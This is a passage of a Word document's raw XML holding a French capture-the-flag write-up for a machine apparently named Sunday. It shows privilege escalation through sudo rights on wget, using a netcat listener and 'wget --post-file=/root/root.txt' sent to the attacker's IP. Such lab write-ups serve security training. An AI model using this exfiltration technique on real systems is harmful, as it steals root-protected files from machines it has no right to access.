        <w:t>On effectue les commandes classiques d’énumération des droits, des fichiers avec le bit SUID, des services pour en voir des louches etc… On se rend</w:t>
      </w:r>
      <w:r w:rsidR="00183DF7">
        <w:t xml:space="preserve"> compte que nous avons le droit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> d’exécuter la commande </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00183DF7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> avec les droits de root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3F6279" w14:paraId="20038F66" w14:textId="77777777" w:rsidTr="00183DF7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9212" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w14:paraId="57BA455B" w14:textId="43A0FFA4" w:rsidR="003F6279" w:rsidRDefault="003F6279"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-l</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3564A549" w14:textId="77777777" w:rsidR="003F6279" w:rsidRDefault="003F6279"/>
    <w:p w14:paraId="1D2C7511" w14:textId="02C5D9D1" w:rsidR="003F6279" w:rsidRDefault="003F6279">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B41C7E4" w14:textId="2E49E63D" w:rsidR="003F6279" w:rsidRDefault="003F6279">
      <w:r>
        <w:t xml:space="preserve">Nous allons alors sur le site </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00183DF7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>GTFOBins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pour connaitre les manipulations à effectuer afin </w:t>
      </w:r>
      <w:r w:rsidR="00751402">
        <w:t xml:space="preserve">de lire le flag </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6AD21A" w14:textId="32FE0E95" w:rsidR="003F6279" w:rsidRDefault="00766DF9">
      <w:r w:rsidRPr="00766DF9">
        <w:t>https://gtfobins.github.io/gtfobins/wget/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212"/>
      </w:tblGrid>
      <w:tr w:rsidR="003F6279" w14:paraId="41B240C0" w14:textId="77777777" w:rsidTr="00183DF7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9212" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w14:paraId="0349CFB7" w14:textId="1986A8C7" w:rsidR="003F6279" w:rsidRDefault="009A5F83">
            <w:r>
              <w:t>$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> –</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lvnp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 1234</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A5F83" w14:paraId="0F7497F1" w14:textId="77777777" w:rsidTr="00183DF7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9212" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w14:paraId="19F963C1" w14:textId="56E374E1" w:rsidR="009A5F83" w:rsidRDefault="009A5F83">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sammy@Sunday</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 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wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> –post-file=/root/root.txt 10.10.14.37 :1234</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FFA5781" w14:textId="77777777" w:rsidR="003F6279" w:rsidRDefault="003F6279"/>
    <w:p w14:paraId="6F07C66F" w14:textId="0640C4FD" w:rsidR="009A5F83" w:rsidRDefault="009A5F83">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DD768D" w14:textId="77777777" w:rsidR="008C403F" w:rsidRDefault="008C403F"/>
    <w:sectPr w:rsidR="008C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4102B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3922214E"/>
    <w:lvl w:ilvl="0" w:tplc="A96C1D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5F"/>
    <w:rsid w:val="00002681"/>
    <w:rsid w:val="00057295"/>
    <w:rsid w:val="00090E0A"/>
    <w:rsid w:val="001356DF"/>
    <w:rsid w:val="00175A16"/>
    <w:rsid w:val="00183DF7"/>
    <w:rsid w:val="001A1837"/>
    <w:rsid w:val="001F27A2"/>
    <w:rsid w:val="0021052D"/>
    <w:rsid w:val="0027792D"/>
    <w:rsid w:val="002A18CE"/>
    <w:rsid w:val="003659FA"/>
    <w:rsid w:val="003B7822"/>
    <w:rsid w:val="003E7160"/>
    <w:rsid w:val="003F6279"/>
    <w:rsid w:val="00425C78"/>
    <w:rsid w:val="004273F9"/>
    <w:rsid w:val="004A536F"/>
    <w:rsid w:val="005075DD"/>
    <w:rsid w:val="00510EA1"/>
    <w:rsid w:val="005127AF"/>
    <w:rsid w:val="00580F21"/>
    <w:rsid w:val="005C7E34"/>
    <w:rsid w:val="006237F0"/>
    <w:rsid w:val="00664130"/>
    <w:rsid w:val="006817A3"/>
    <w:rsid w:val="006C4541"/>
    <w:rsid w:val="006D36FE"/>
    <w:rsid w:val="0070525D"/>
    <w:rsid w:val="007109F2"/>
    <w:rsid w:val="00751402"/>
    <w:rsid w:val="00766DF9"/>
    <w:rsid w:val="007B3580"/>
    <w:rsid w:val="007B7FB0"/>
    <w:rsid w:val="007C48E4"/>
    <w:rsid w:val="00800B7D"/>
    <w:rsid w:val="008827D1"/>
    <w:rsid w:val="00882A2E"/>
    <w:rsid w:val="008870BD"/>
    <w:rsid w:val="008C044D"/>
    <w:rsid w:val="008C403F"/>
    <w:rsid w:val="008C485F"/>
    <w:rsid w:val="008F10EC"/>
    <w:rsid w:val="00923C1E"/>
    <w:rsid w:val="00976C4F"/>
    <w:rsid w:val="009A5F83"/>
    <w:rsid w:val="00A14808"/>
    <w:rsid w:val="00A600A9"/>
    <w:rsid w:val="00A61CAE"/>
    <w:rsid w:val="00B60FC6"/>
    <w:rsid w:val="00BE37F2"/>
    <w:rsid w:val="00C9644C"/>
    <w:rsid w:val="00D903A0"/>
    <w:rsid w:val="00E04985"/>
    <w:rsid w:val="00E3337A"/>
    <w:rsid w:val="00EE6D95"/>
    <w:rsid w:val="00EE6EFA"/>
    <w:rsid w:val="00F13D62"/>
    <w:rsid w:val="00F151FB"/>
    <w:rsid w:val="00F5451B"/>
    <w:rsid w:val="00F81533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F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54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2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E333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54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2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E33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testmonkey/finger-user-en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Utilisateur Windows</cp:lastModifiedBy>
  <cp:revision>58</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-10T07:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-13T14:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>